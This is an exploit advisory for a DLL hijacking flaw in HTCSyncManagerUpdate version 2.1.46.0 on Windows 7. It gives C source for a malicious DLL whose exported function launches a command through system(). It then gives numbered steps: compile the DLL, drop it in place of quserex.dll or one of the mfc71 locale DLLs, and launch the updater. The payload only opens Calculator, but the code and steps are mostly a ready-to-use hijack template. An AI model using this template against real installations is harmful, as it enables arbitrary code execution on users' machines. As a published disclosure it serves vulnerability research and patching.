HTCSyncManagerUpdate suffers from a DLL hijacking vulnerability.
ad905bd9bcf7e2e3e3dede4db2a90756d50e43d1bf2fbb25720795e376245cda
Exploit Title: HTCSyncManagerUpdate (quserex.dll & mfc71enu.dll & mfc71loc.dll ) Path Subversion Arbitrary DLL Injection Code Execution
Author: Iranian_Dark_Coders_Team
Discovered by A.CH12
Software Link: http://www.htc.com/
Version: 2.1.46.0
Tested on: Windows 7
// :::'###::::::::::::::::'######::'##::::'##::::'##::::'#######::
// ::'## ##::::::::::::::'##... ##: ##:::: ##::'####:::'##.... ##:
// :'##:. ##::::::::::::: ##:::..:: ##:::: ##::.. ##:::..::::: ##:
// '##:::. ##:::::::::::: ##::::::: #########:::: ##::::'#######::
// #########:::::::::::: ##::::::: ##.... ##:::: ##:::'##::::::::
// ##.... ##::::'###:::: ##::: ##: ##:::: ##:::: ##::: ##::::::::
// ##:::: ##:::: ###::::. ######:: ##:::: ##::'######: #########:
// ..:::::..:::::...::::::......:::..:::::..:::......::.........::
=============================================================
#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void DwmSetWindowAttribute() { egg(); }
int egg()
{
system ("calc");
exit(0);
return 0;
}
=============================================================
Instructions:
1. Compile dll
2. Replace quserex.dll or mfc71enu.dll or mfc71loc.dll in HTC Sync Manager directory with your newly compiled dll
3. Launch HTCSyncManagerUpdate
4. Bo0o0o0o0o0o0o0m !
Greet to my Lovely friends :
nimaarek , D.S (ASA);